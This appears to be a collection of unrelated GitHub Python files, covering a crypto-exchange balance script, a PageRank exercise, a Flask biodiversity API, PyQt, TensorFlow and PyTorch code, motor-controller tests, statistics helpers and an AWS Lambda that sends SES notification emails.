+{"seq_id":"20650886413","text":"import time\nfrom time import timezone\n\nimport pyupbit\nimport datetime\nimport pytz\naccess_key = \"\"\nsecret_key = \"\"\n\nupbit = pyupbit.Upbit(access_key, secret_key)\n# krw = upbit.get_balance(\"KRW-ETH\")[2]\n\n    #krw = upbit.get_balance()\n# ticker=\"KRW-ETH\"\nticker=\"KRW-BTC\"\nkrw = upbit.get_balance(\"KRW-AXS\")\n# print(krw)\norderbook = pyupbit.get_orderbook(ticker)\n\n\na1 = upbit.get_balance()\n# print(a1)\na2 = round(a1 // 10000)\n# print ('a2=',a2)\na3 = a2 * 10000\n# print(a3)\n\n# if ticker==\"KRW-XRP\":\n    # print('same')\n#print('orderbook = ',orderbook)\nsell_price = orderbook['orderbook_units'][0]['bid_price']\n# sell_price = orderbook['ask_price'][0]['price']\n# print(sell_price)\n# unit = krw / float(sell_price)\n# unit = 10000 / float(sell_price)\n# upbit.buy_market_order(ticker, unit)\n# ret = upbit.buy_limit_order(ticker, 100, 50)\n# print(ret)\n# orderbook = pyupbit.get_orderbook(\"KRW-ETH\")\n# print(orderbook)\n# now = datetime.datetime.now(pytz.timezone('UTC'))\n# mid = datetime.datetime(now.year, now.month, now.day) + datetime.timedelta(1)\n# timezone(datetime.timedelta(hours=9))\n# print(now)\n# print(mid)\nnow = datetime.datetime.utcnow()\nmid = datetime.datetime(now.year, now.month, now.day) + datetime.timedelta(1)\nprint (now, mid)\n# time.sleep(3)\ndf = pyupbit.get_ohlcv(ticker)\n# print(df)\nyesterday = df.iloc[-2]\nprint(yesterday)","repo_name":"squasy/stock","sub_path":"balance.py","file_name":"balance.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"39519738259","text":"\"\"\"\nThe coefficient α in the PageRank algorithm is sometimes called the \"boredom factor\", or \"damping factor\" in English. \nThe name comes from the role it plays in modeling the behavior of users while they browse web pages.\n\nIn the PageRank algorithm, α is a parameter that controls the probability that a user, instead of clicking a link on the page, \nwill continue browsing pages at random. In other words, α represents the probability that the user gets \"bored\" \nand may decide to move to a different page instead of continuing to browse by following the links.\n\nWhy is this important? If α were equal to 1, the user would be fully \"engaged\" and would keep clicking further links. \nIn that case, there is a risk that the user could get stuck in a loop or cycle of pages, which is not desirable. 
\nDlatego też wprowadzenie współczynnika znudzenia, α < 1, pomaga uniknąć takich sytuacji, umożliwiając użytkownikowi czasem przechodzenie \nna nową stronę, niezależnie od linków na bieżącej stronie.\n\nPraktycznie, wartość α jest często ustalana na 0,85 w algorytmie PageRank, co oznacza, że istnieje 15% szansa na to, \nże użytkownik \"znudzi się\" i przejdzie do innej strony, zamiast kontynuować klikanie w linki. \nTen współczynnik znudzenia pomaga zrównoważyć algorytm, poprawiając jakość wyników wyszukiwania \ni zapobiegając utknięciu w nieskończonych pętlach stron.\n\nW ten sposób, nazywanie α \"współczynnikiem znudzenia\" odzwierciedla jego rolę w modelowaniu zachowania \nużytkowników i wprowadzeniu pewnej losowości w proces nawigacji po stronach internetowych.\n\"\"\"\n\n\nimport numpy as np\nfrom scipy.linalg import solve\nfrom markov import (\n calculate_stationary_distribution_many,\n calculate_stationary_distribution,\n calculate_state_probability,\n)\n\n# Define the directed graph G and its transition matrix PG\nPG = np.array(\n [\n [1, 0, 0, 0, 0, 0],\n [0, 0, 1 / 2, 0, 1 / 2, 0],\n [1, 0, 0, 0, 0, 0],\n [0, 1 / 2, 0, 0, 1 / 2, 0],\n [0, 0, 0, 1, 0, 0],\n [0, 0, 1, 0, 0, 0],\n ]\n)\n\nPG2 = np.array(\n [\n [1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0],\n [1, 0, 0, 0, 0, 0],\n [0, 1 / 2, 0, 0, 1 / 2, 0],\n [0, 0, 0, 1, 0, 0],\n [0, 0, 1, 0, 0, 0],\n ]\n)\n\nalpha_values = [0, 0.15, 0.5, 1]\n\nfor alpha in alpha_values:\n stationary_distribution = calculate_stationary_distribution(PG, alpha)\n stationary_distribution2 = calculate_stationary_distribution(PG2, alpha)\n print(f\"Alpha = {alpha}:\")\n print(f\"PG:\\t\\t{[round(n,3) for n in stationary_distribution]}\")\n print(f\"PG2:\\t\\t{[round(n,3) for n in stationary_distribution2]}\")\n print(f\"PG2(MC):\\t{[round(n,3) for n in calculate_state_probability(PG2,100,alpha, random_state=True)]}\")\n print(f\"PG2(many):\\t{[round(n,3) for n in calculate_stationary_distribution_many(PG2,alpha)]}\")\n print()\n","repo_name":"corradoo/aa","sub_path":"l6/ex12.py","file_name":"ex12.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43620723778","text":"# import necessary libraries\nimport pandas as pd\nimport numpy as np\nimport os\nfrom flask import (\n Flask,\n render_template,\n jsonify,\n request)\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\nenvport = os.environ.get('PORT')\n#################################################\n# Data is fetched from csv files to Pandas dataframes\n#################################################\n\n#fetch data - csv + pandas or sqlite - chose to use csv + pandas\n# read in csv file in dataframe\nmetadata_df = pd.read_csv(\"./DataSets/Belly_Button_Biodiversity_Metadata.csv\", index_col=None)\n\n# find columns with all null values if any.\nnull_cols = metadata_df.columns[metadata_df.isnull().all()].tolist() \n\n# delete columns with all null values\nmetadata_df = metadata_df.drop(null_cols, 1) # axis = 1\n\n# Replace NaN values with 0s, as replacing with 0s won't hurt the results.\nmetadata_df = metadata_df.fillna(0)\n\n# extract required column as a list \nsample_IDs = metadata_df['SAMPLEID'].tolist()\n\nsample_names = [\"BB_\" + str(s) for s in sample_IDs]\n\n\n#################################################\n# Routes\n#################################################\n\n@app.route(\"/\")\n# Returns the 
dashboard homepage.\ndef home():\n # return \"Welcome!\"\n sample_names = [\"BB_\" + str(s) for s in sample_IDs]\n print(sample_names)\n return render_template('index.html', sample_names=sample_names)\n\n@app.route('/names')\n# List of sample names.\n # Returns a list of sample names in the format\n # [\n # \"BB_940\",\n # \"BB_941\",\n # \"BB_943\",\n # \"BB_944\",\n # \"BB_945\",\n # \"BB_946\",\n # \"BB_947\",\n # ...\n # ]\ndef samp_names():\n # add required prefix to each item in the list\n # sample_IDs = metadata_df['SAMPLEID'].tolist()\n sample_names = [\"BB_\" + str(s) for s in sample_IDs] # sample_IDs defined above routes\n return(jsonify(sample_names))\n\n@app.route('/otu')\n # List of OTU descriptions.\n\n # Returns a list of OTU descriptions in the following format\n\n # [\n # \"Archaea;Euryarchaeota;Halobacteria;Halobacteriales;Halobacteriaceae;Halococcus\",\n # \"Archaea;Euryarchaeota;Halobacteria;Halobacteriales;Halobacteriaceae;Halococcus\",\n # \"Bacteria\",\n # \"Bacteria\",\n # \"Bacteria\",\n # ...\n # ]\n\ndef otu_describe():\n # read in csv file in dataframe\n otu_df = pd.read_csv(\"./DataSets/belly_button_biodiversity_otu_id.csv\")\n otu_df = otu_df.dropna(axis=0, thresh=1) \n\n # extract required column by index only as there is no column heading\n otu_descriptions = otu_df.iloc[:, 1].values.tolist()\n return(jsonify(otu_descriptions))\n\n@app.route('/metadata/<sample>')\n # MetaData for a given sample.\n # Args: Sample in the format: `BB_940`\n # Returns a json dictionary of sample metadata in the format\n # {\n # AGE: 24,\n # BBTYPE: \"I\",\n # ETHNICITY: \"Caucasian\",\n # GENDER: \"F\",\n # LOCATION: \"Beaufort/NC\",\n # SAMPLEID: 940\n # }\n\ndef samplefunction(sample):\n # e.g. from sample argument `BB_940`, only 940 is extracted below\n sample_id = int(sample[3:])\n # single row df created below\n row_df = metadata_df.loc[metadata_df['SAMPLEID'] == sample_id]\n # df with needed columns\n sample_df = row_df[['AGE','BBTYPE','ETHNICITY','GENDER','LOCATION','SAMPLEID']]\n # 'records' arg creates a list of dictionaries (here only 1 dict)\n sample_dict = sample_df.to_dict('records') \n # [0] returns dict in { } format, without [0] it returns in [{ }] format as its a list.\n return(jsonify(sample_dict[0])) \n\n@app.route('/wfreq/<sample>')\n # Weekly Washing Frequency as a number.\n\n # Args: Sample in the format: `BB_940`\n\n # Returns an integer value for the weekly washing frequency `WFREQ`\n\ndef wash_freq(sample):\n # e.g. from sample argument `BB_940`, only 940 is extracted below\n sample_id = int(sample[3:])\n # single row df created below\n row_df = metadata_df.loc[metadata_df['SAMPLEID'] == sample_id] \n print(row_df)\n # df with needed columns. 
Rounded because BB_963 has freq 3.5 \n WFREQ = int(round((row_df.iloc[0]['WFREQ'])))\n #print(WFREQ)\n return(jsonify(WFREQ))\n\n\n@app.route('/samples/<sample>')\n # OTU IDs and Sample Values for a given sample.\n\n # Sort your Pandas DataFrame (OTU ID and Sample Value)\n # in Descending Order by Sample Value\n\n # Return a list of dictionaries containing sorted lists for `otu_ids`\n # and `sample_values`\n\n # [\n # {\n # otu_ids: [\n # 1166,\n # 2858,\n # 481,\n # ...\n # ],\n # sample_values: [\n # 163,\n # 126,\n # 113,\n # ...\n # ]\n # }\n # ]\ndef ids_values(sample):\n samples_df = pd.read_csv(\"./DataSets/belly_button_biodiversity_samples.csv\", index_col=None)\n # fill NaNs with 0's\n samples_df = samples_df.fillna(0) \n # get the 2 required columns; one is passed sample from function arg.\n id_values_df = samples_df[['otu_id', sample]].copy()\n values_descend_df = id_values_df.sort_values(sample, ascending=False)\n values_descend_df[sample] = values_descend_df[sample].astype(int) # convert sample column values to 'int's\n values_descend_df.columns = ['otu_id', 'sample_values'] # rename columns as per instruction\n values_descend_dict = values_descend_df.to_dict('list') # convert to dict in required form\n values_descend_list = [] # create list \n values_descend_list.append(values_descend_dict.copy())\n return(jsonify(values_descend_list))\n\n\n\nif __name__ == \"__main__\":\n app.run(port=int(envport) if envport != None else 5000, host=\"0.0.0.0\")\n","repo_name":"ptendolkar1/Biodiversity_unit15_HW_challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8276969802","text":"\"\"\"\nScroll area in the main window\n\"\"\"\nfrom PyQt5.QtWidgets import QScrollArea, QGroupBox, QFormLayout, QLabel, QHBoxLayout\nfrom PyQt5.QtCore import QRect\n\nfrom .h_box import HBox\nfrom .utils import get_filenames\n\n\nclass ScrollArea(QScrollArea):\n \"\"\"Class ScrollArea for main window\"\"\"\n\n def __init__(self, parent: \"MainWindow\", imgs_path: str):\n super().__init__(parent)\n\n self.parent = parent\n size = parent.size()\n self.resize(size)\n\n img_names = get_filenames(imgs_path)\n\n self.formLayout = QFormLayout()\n groupBox = QGroupBox()\n\n for img_name in img_names:\n img_path = imgs_path + img_name\n self.formLayout.addRow(HBox(parent, img_path))\n groupBox.setLayout(self.formLayout)\n\n self.setWidget(groupBox)\n self.setWidgetResizable(True)\n\n def add_rows(self, img_path_list: list) -> None:\n \"\"\"\n Adding multiple rows to scrollArea\n \"\"\"\n for img_path in img_path_list:\n self.add_row(img_path)\n\n def add_row(self, img_path) -> None:\n \"\"\"\n Adding one row to scrollArea\n \"\"\"\n self.formLayout.addRow(\n HBox(self.parent, img_path)\n )\n","repo_name":"olfori/img_downloader_app","sub_path":"collection/scroll_area.py","file_name":"scroll_area.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43644143003","text":"## 神经网络的前向传播结果,需要三部分信息:\n## 第一部分: 神经网络的输入,即从实体中提取的特征向量。\n## 第二部分: 神经网络的连接结构,即神经网络中的神经元,也称节点。\n## 第三部分: 神经网络中每个神经元中的参数。\n\nimport tensorflow as tf\n\n# 声明2个变量,并通过seed设置随机种子\nw1 = tf.Variable(tf.random_normal([2,3],stddev=1,seed=1))\nw2 = tf.Variable(tf.random_normal([3,1],stddev=1,seed=1))\n\n# xx 输入值的特征向量,暂时定为常量,为1*2矩阵\nx = tf.constant([[0.7,0.9]])\n\n# 通过前面描述的前向传播算法,获得神经网络的输出\na = tf.matmul(x,w1)\ny = 
tf.matmul(a,w2)\n\nsess = tf.Session()\n# 因为w1 w2还没运行初始化过程,所以不能直接sess.run(y)获取y值。\nsess.run(w1.initializer)\nsess.run(w2.initializer)\n\n# 获取y值\nprint(sess.run(y)) # [[ 3.95757794]]\nsess.close()\n\n#############################################\n\n## 升级版 通过placeholder写法:\nimport tensorflow as tf\n\n# 声明2个变量,并通过seed设置随机种子\nw1 = tf.Variable(tf.random_normal([2,3],stddev=1,seed=1))\nw2 = tf.Variable(tf.random_normal([3,1],stddev=1,seed=1))\n\n# xx 输入值的特征向量,暂时定为常量,为1*2矩阵\n# 若这里使用的是 n*m 矩阵,则在feed_dict也要传入对应格式数据\nx = tf.placeholder(tf.float32, shape=(1,2), name=\"input\")\n\n# 通过前面描述的前向传播算法,获得神经网络的输出\na = tf.matmul(x,w1)\ny = tf.matmul(a,w2)\n\nsess = tf.Session()\ninit_op = tf.global_variables_initializer()\n# initialize_all_variables被 global_variables_initializer 代替\nsess.run(init_op)\n\n# 获取y值\nprint(sess.run(y,feed_dict={x:[[0.7,0.9]]})) # [[ 3.95757794]]\nsess.close()\n","repo_name":"pingan8787/Leo_MachineLearing","sub_path":"2-TensorFlow/《tensorflow实战google深度学习框架》demo/4-TensorFlow实现神经网络-前向传播算法.py","file_name":"4-TensorFlow实现神经网络-前向传播算法.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"74861522085","text":"import os\nimport time\nimport torch\nimport numpy as np\n\nfrom PIL import Image\nfrom torch.utils import data\nimport json\nfrom joblib import Parallel, delayed\n\n\ndef parallel_load(img_dir, img_list, img_size, verbose=0):\n return Parallel(n_jobs=-1, verbose=verbose)(delayed(\n lambda file: Image.open(os.path.join(img_dir, file)).convert(\"L\").resize(\n (img_size, img_size), resample=Image.BILINEAR))(file) for file in img_list)\n\n\nclass AnomalyDetectionDataset(data.Dataset):\n def __init__(self, main_path, img_size=64, transform=None, mode=\"train\", extra_data=0, ar=0.):\n super(AnomalyDetectionDataset, self).__init__()\n assert mode in [\"train\", \"test\"]\n self.root = main_path\n self.labels = []\n self.img_id = []\n self.slices = []\n self.transform = transform if transform is not None else lambda x: x\n\n with open(os.path.join(main_path, \"data.json\")) as f:\n data_dict = json.load(f)\n\n print(\"Loading images\")\n if mode == \"train\":\n train_normal = data_dict[\"train\"][\"0\"]\n\n normal_l = data_dict[\"train\"][\"unlabeled\"][\"0\"]\n abnormal_l = data_dict[\"train\"][\"unlabeled\"][\"1\"]\n if extra_data > 0:\n abnormal_num = int(extra_data * ar)\n normal_num = extra_data - abnormal_num\n else:\n abnormal_num = 0\n normal_num = 0\n\n train_l = train_normal + normal_l[:normal_num] + abnormal_l[:abnormal_num]\n t0 = time.time()\n self.slices += parallel_load(os.path.join(self.root, \"images\"), train_l, img_size)\n self.labels += (len(train_normal) + normal_num) * [0] + abnormal_num * [1]\n self.img_id += [img_name.split('.')[0] for img_name in train_l]\n print(\"Loaded {} normal images, \"\n \"{} (unlabeled) normal images, \"\n \"{} (unlabeled) abnormal images. {:.3f}s\".format(len(train_normal), normal_num, abnormal_num,\n time.time() - t0))\n\n else: # test\n test_normal = data_dict[\"test\"][\"0\"]\n test_abnormal = data_dict[\"test\"][\"1\"]\n\n test_l = test_normal + test_abnormal\n t0 = time.time()\n self.slices += parallel_load(os.path.join(self.root, \"images\"), test_l, img_size)\n self.labels += len(test_normal) * [0] + len(test_abnormal) * [1]\n self.img_id += [img_name.split('.')[0] for img_name in test_l]\n print(\"Loaded {} test normal images, \"\n \"{} test abnormal images. 
{:.3f}s\".format(len(test_normal), len(test_abnormal), time.time() - t0))\n\n def __getitem__(self, index):\n img = self.slices[index]\n label = self.labels[index]\n img = self.transform(img)\n img_id = self.img_id[index]\n return img, label, img_id\n\n def __len__(self):\n return len(self.slices)\n\n\nclass SelfAnomalyDataset(data.Dataset):\n def __init__(self, main_path, img_size=64, transform=None):\n super(SelfAnomalyDataset, self).__init__()\n self.root = main_path\n self.slices = []\n self.transform = transform if transform is not None else lambda x: x\n self.anomaly_transform = self.transform\n\n with open(os.path.join(main_path, \"data.json\")) as f:\n data_dict = json.load(f)\n\n print(\"Loading images\")\n t0 = time.time()\n train_normal = data_dict[\"train\"][\"0\"]\n self.slices += parallel_load(os.path.join(self.root, \"images\"), train_normal, img_size)\n print(\"Loaded {} normal images. {:.3f}s\".format(len(train_normal), time.time() - t0))\n\n def __getitem__(self, index):\n img = self.slices[index]\n img = self.transform(img)\n if np.random.rand() > 0.5:\n img, mask = self.generate_anomaly(img, index, core_percent=0.8)\n label = 1\n else:\n mask = torch.zeros_like(img).squeeze().long()\n label = 0\n return img, label, mask\n\n def __len__(self):\n return len(self.slices)\n\n def generate_anomaly(self, image, index, core_percent=0.8):\n dims = np.array(np.shape(image)[1:]) # H x W\n core = core_percent * dims # width of core region\n offset = (1 - core_percent) * dims / 2 # offset to center core\n\n min_width = np.round(0.05 * dims[1])\n max_width = np.round(0.2 * dims[1]) # make sure it is less than offset\n\n center_dim1 = np.random.randint(offset[0], offset[0] + core[0])\n center_dim2 = np.random.randint(offset[1], offset[1] + core[1])\n patch_center = np.array([center_dim1, center_dim2])\n patch_width = np.random.randint(min_width, max_width)\n\n coor_min = patch_center - patch_width\n coor_max = patch_center + patch_width\n\n # clip coordinates to within image dims\n coor_min = np.clip(coor_min, 0, dims)\n coor_max = np.clip(coor_max, 0, dims)\n\n alpha = torch.rand(1) #\n mask = torch.zeros_like(image).squeeze()\n mask[coor_min[0]:coor_max[0], coor_min[1]:coor_max[1]] = alpha\n mask_inv = 1 - mask\n\n # mix\n anomaly_source_index = np.random.randint(0, len(self.slices))\n while anomaly_source_index == index:\n anomaly_source_index = np.random.randint(0, len(self.slices))\n anomaly_source = self.slices[anomaly_source_index]\n anomaly_source = self.anomaly_transform(anomaly_source)\n image_synthesis = mask_inv * image + mask * anomaly_source\n\n return image_synthesis, (mask > 0).long()\n","repo_name":"caiyu6666/DDAD-ASR","sub_path":"anomaly_data.py","file_name":"anomaly_data.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"52"} +{"seq_id":"2461795231","text":"from time import sleep\nfrom unittest import TestCase\nfrom RPi.GPIO import setmode, BOARD, cleanup as cleanup_gpio\n\nfrom srmlib.gpiocontrollers.motorshields import CytronMD10C\nfrom srmlib.gpiocontrollers.constants import FORWARD, BACKWARD\n\n\nclass CytronMD10CTest(TestCase):\n @classmethod\n def setUpClass(cls) -> None:\n cls.pwm_pin = int(input(\"Enter pwm pin number: \"))\n cls.direction_pin = int(input(\"Enter direction pin number: \"))\n\n def setUp(self) -> None:\n setmode(BOARD)\n self.controller = CytronMD10C(self.direction_pin, self.pwm_pin)\n\n def tearDown(self) -> None:\n cleanup_gpio()\n\n def 
test__should_move_forward(self) -> None:\n # Arrange\n print(f\"!!! TEST - Expected Observation: Engine should run FORWARD for 3 seconds then stop\")\n input(\"Press Enter to run test...\")\n\n # Act\n self.controller.direction = FORWARD\n self.controller.speed = 50\n sleep(3)\n self.controller.speed = 0\n\n # Assert\n test_succeeded = input(\"Did the engine perform as expected? (Y/n) \").lower() in {\"\", \"y\"}\n self.assertTrue(test_succeeded)\n\n def test__should_move_backward(self) -> None:\n # Arrange\n print(f\"!!! TEST - Expected Observation: Engine should run BACKWARD for 3 seconds then stop\")\n input(\"Press Enter to run test...\")\n\n # Act\n self.controller.direction = BACKWARD\n self.controller.speed = 50\n sleep(3)\n self.controller.speed = 0\n\n # Assert\n test_succeeded = input(\"Did the engine perform as expected? (Y/n) \").lower() in {\"\", \"y\"}\n self.assertTrue(test_succeeded)\n\n def test__should_ramp_up_speed(self) -> None:\n # Arrange\n print(f\"!!! TEST - Expected Observation: Engine should run FORWARD, starting slowly and speeding up for 10 seconds total then stop\")\n input(\"Press Enter to run test...\")\n\n # Act\n self.controller.direction = FORWARD\n self.controller.speed = 20\n sleep(2)\n self.controller.speed = 40\n sleep(2)\n self.controller.speed = 60\n sleep(2)\n self.controller.speed = 80\n sleep(2)\n self.controller.speed = 100\n sleep(2)\n self.controller.speed = 0\n\n # Assert\n test_succeeded = input(\"Did the engine perform as expected? (Y/n) \").lower() in {\"\", \"y\"}\n self.assertTrue(test_succeeded)\n","repo_name":"SaskatoonRailwayModellers/SRMLib-GPIOControllers","sub_path":"tests/interactive/gpiocontrollers/test_motorshields.py","file_name":"test_motorshields.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28277192519","text":"import numpy as np\nfrom scipy.special import gamma\nfrom scipy.optimize import root\nfrom scipy import integrate\nimport scipy.stats\n\n\ndef gaussian(x, mean, var):\n return np.exp(-(x-mean)**2/(2*var)) / np.sqrt(2*np.pi*var)\n\ndef t(x, df):\n return gamma((df+1)/2) / (gamma(df/2)*np.sqrt(np.pi*df)) * (1+x**2/df)**(-(df+1)/2)\n\ndef F(x, df1, df2):\n # check x is a numpy ndarray or not\n if type(x).__module__ == 'numpy':\n xn = x.copy()\n xn[xn <= 0] = 0\n else:\n xn = x\n return gamma((df1+df2)/2) * (df1/df2)**(df1/2) * xn**(df1/2-1) \\\n / (gamma(df1/2) * gamma(df2/2) * (1+df1*xn/df2)**(df1/2+df2/2))\n\ndef chi_square(x, df):\n return (0.5**(df/2) * x**(df/2-1) * np.exp(-x/2)) / gamma(df/2)\n\ndef critical_value(func_type, alpha, **kwargs):\n \"\"\"\n find the critical value that the right area is equal to alpha\n \n Parameter:\n ---------\n func_type: 'F', 't', 'chi' or 'gaussian'.\n alpha: float\n \n **kwargs:\n dfs: tuple. degree of freedom\n mean_var: tuple. 
mean and variance for gaussian\n \n Return:\n ------\n a critical value that the right area is equal to alpha\n \"\"\"\n if func_type == 'F':\n dfn, dfd = kwargs.get('dfs')\n return scipy.stats.f.ppf(1-alpha, dfn=dfn, dfd=dfd)\n elif func_type == 't':\n df = kwargs.get('dfs')\n return scipy.stats.t.ppf(1-alpha, df=df)\n elif func_type == 'chi':\n df = kwargs.get('dfs')\n return scipy.stats.chi2.ppf(1-alpha, df=df)\n elif func_type == 'gaussian':\n mean_var = kwargs.get('mean_var')\n return scipy.stats.norm.ppf(1-alpha, loc=mean_var[0], scale=np.sqrt(mean_var[1]))\n \ndef find_p_value(test_type, tail, test_statistic, dfs=None):\n \"\"\"\n find p-value in the right/left/two tail hypothesis test\n \n Parameter:\n ---------\n test_type: str, 'F', 't', 'z' or 'chi'\n tail: str, 'right', 'left' or 'two'\n test_statistic: scaler, test statistic in the hypothesis test\n dfs: tuple, degree of freedom. it can be ignored if func_type = 'z'\n \n Return:\n ------\n p-value\n \"\"\"\n if test_type == 'F':\n if tail == 'right':\n return 1 - scipy.stats.f.cdf(test_statistic, dfn=dfs[0], dfd=dfs[1])\n elif tail == 'left':\n return scipy.stats.f.cdf(test_statistic, dfn=dfs[0], dfd=dfs[1])\n\n if test_type == 't':\n if tail == 'right':\n return 1 - scipy.stats.t.cdf(test_statistic, df=dfs)\n elif tail == 'left':\n return scipy.stats.t.cdf(test_statistic, df=dfs)\n elif tail == 'two':\n test_statistic = -np.abs(test_statistic)\n return 2 * scipy.stats.t.cdf(test_statistic, df=dfs)\n \n if test_type == 'chi':\n if tail == 'right':\n return 1 - scipy.stats.chi2.cdf(test_statistic, df=dfs)\n elif tail == 'left':\n return scipy.stats.chi2.cdf(test_statistic, df=dfs)\n \n if test_type == 'z':\n if tail == 'right':\n return 1 - scipy.stats.norm.cdf(test_statistic)\n elif tail == 'left':\n return scipy.stats.norm.cdf(test_statistic)\n elif tail == 'two':\n test_statistic = -np.abs(test_statistic)\n return 2 * scipy.stats.norm.cdf(test_statistic)\n\n\n\n\n\n\n'''\n\ndef critical_value(func_type, alpha, **kwargs):\n \"\"\"\n find the critical value that the right area is equal to alpha\n \n Parameter:\n ---------\n func_type: 'F', 't', 'chi' or 'gaussian'.\n alpha: float\n \n **kwargs:\n dfs: tuple. degree of freedom\n mean_var: tuple. mean and variance for gaussian\n \n Return:\n ------\n a critical value that the right area is equal to alpha\n \"\"\"\n if kwargs.keys() - set(['dfs', 'mean_var']):\n # kwargs contains some not allowed keyword parameter\n raise ValueError(\"unrecognized kwargs. only 'dfs' and 'mean_var' available.\")\n if not kwargs.get('dfs') and not kwargs.get('mean_var'):\n raise ValueError(\"miss keyword argument 'dfs' or 'mean_var'.\")\n \n dfs = kwargs.get('dfs')\n mean_var = kwargs.get('mean_var')\n \n if func_type == 'F':\n f = lambda x: integrate.quad(F, x, 40, args=dfs)[0] - alpha\n elif func_type == 't':\n f = lambda x: integrate.quad(t, x, 20, args=dfs)[0] - alpha\n elif func_type == 'chi':\n f = lambda x: integrate.quad(chi_square, x, 80, args=dfs)[0] - alpha\n elif func_type == 'gaussian':\n f = lambda x: integrate.quad(gaussian, x, mean_var[1]*6, args=mean_var)[0] - alpha\n\n return root(f, x0=1).x\n\ndef find_p_value(test_type, tail, test_statistic, dfs=None):\n \"\"\"\n find p-value in the right/left/two tail hypothesis test\n \n Parameter:\n ---------\n test_type: str, 'F', 't', 'z' or 'chi'\n tail: str, 'right', 'left' or 'two'\n test_statistic: scaler, test statistic in the hypothesis test\n dfs: tuple, degree of freedom. 
it can be ignored if func_type = 'z'\n \n Return:\n ------\n p-value\n \"\"\"\n if tail == 'right':\n m = 1\n ep = [60, 20, 10, 80] # endpoint of integrate\n elif tail == 'left':\n m = -1\n ep = [0, -20, -10, 0]\n elif tail == 'two':\n m = 2\n ep = [60, 20, 10, 80]\n test_statistic = np.abs(test_statistic)\n \n if test_type == 'F':\n return m * integrate.quad(F, test_statistic, test_statistic+ep[0], args=dfs)[0]\n elif test_type == 't':\n return m * integrate.quad(t, test_statistic, test_statistic+ep[1], args=dfs)[0]\n elif test_type == 'z':\n return m * integrate.quad(gaussian, test_statistic, test_statistic+ep[2], args=(0,1))[0]\n elif test_type == 'chi':\n return m * integrate.quad(chi_square, test_statistic, test_statistic+ep[2], args=dfs)[0]\n else:\n raise ValueError(\"Unpermitted func_type\")\n \n'''","repo_name":"CYehLu/Regression-Analysis","sub_path":"Regression/Inner/distribution.py","file_name":"distribution.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18480672418","text":"import json\nimport urllib.parse\nfrom datetime import datetime, timedelta\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\n# Deactivating as of 2022-07-12 - lambda subscribed to sqs makes it poll 1000s of times a month.\n# from botocore.vendored import requests\n\n\ndef send_ses_email(\n s3_key=\"DEFAULT\", s3_bucket=\"DEFAULT\", s3_event_time=\"DEFAULT\", kwargs=\"\"\n):\n SENDER = \"jyablonski9@gmail.com\"\n RECIPIENT = \"jyablonski9@gmail.com\"\n # CONFIGURATION_SET = \"ConfigSet\"\n AWS_REGION = \"us-east-1\"\n\n SUBJECT = f\"{s3_key} S3 FILE ARRIVED IN {s3_bucket} at {s3_event_time}\"\n\n # The email body for recipients with non-HTML email clients.\n BODY_TEXT = f\"{kwargs}{s3_key} arrived in {s3_bucket} at {s3_event_time}\"\n\n # The HTML body of the email.\n BODY_HTML = f\"\"\"<html>\n <head></head>\n <body>\n <h1>Amazon SES Test (SDK for Python)</h1>\n <p>This email was sent with\n <a href='https://aws.amazon.com/ses/'>Amazon SES</a> using the\n <a href='https://aws.amazon.com/sdk-for-python/'>\n AWS SDK for Python (Boto)</a>.</p>\n <p>
\n {s3_key} arrived in {s3_bucket} at {s3_event_time}</p>\n </body>\n </html>\n \"\"\"\n\n CHARSET = \"UTF-8\"\n client = boto3.client(\"ses\", region_name=AWS_REGION)\n try:\n response = client.send_email(\n Destination={\"ToAddresses\": [RECIPIENT,],},\n Message={\n \"Body\": {\n \"Html\": {\"Charset\": CHARSET, \"Data\": BODY_HTML,},\n \"Text\": {\"Charset\": CHARSET, \"Data\": BODY_TEXT,},\n },\n \"Subject\": {\"Charset\": CHARSET, \"Data\": SUBJECT,},\n },\n Source=SENDER,\n # ConfigurationSetName=CONFIGURATION_SET,\n )\n except ClientError as e:\n print(e.response[\"Error\"][\"Message\"])\n else:\n print(\"Email sent! Message ID:\"),\n print(response[\"MessageId\"])\n\n\nprint(\"Loading function\")\n\ns3 = boto3.client(\"s3\")\n\n\ndef lambda_handler(event, context):\n \"\"\"\n SQS Lambda Function - Format is S3 -> SNS -> SQS -> Lambda.\n The S3 notification code is inside ['body']['Message']\n The for loops are to iterate through dict lists (elements 0, 1, 2), instead of going event['Records'][0]\n \"\"\"\n # print(event)\n try:\n for s3_event in event[\"Records\"]:\n df = json.loads(json.loads(s3_event[\"body\"])[\"Message\"])\n for s3_record in df[\"Records\"]:\n bucket = s3_record[\"s3\"][\"bucket\"][\"name\"]\n print(f\"Grabbing Bucket {bucket}\")\n\n key = s3_record[\"s3\"][\"object\"][\"key\"]\n print(f\"Grabbing key {key}\")\n\n event_time = s3_record[\"eventTime\"]\n print(f\"Grabbing event time {event_time}\")\n\n send_ses_email(key, bucket, event_time)\n print(f\"Sending SES Email\")\n except BaseException as e:\n print(f\"Error Occurred, {e}\")\n send_ses_email(kwargs=e)\n df = (\n []\n ) # if you do raise e instead of this, lambda will keep retrying and using resources instead of just stopping.\n return df\n","repo_name":"jyablonski/aws_terraform","sub_path":"lambdas/lambda_sqs/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 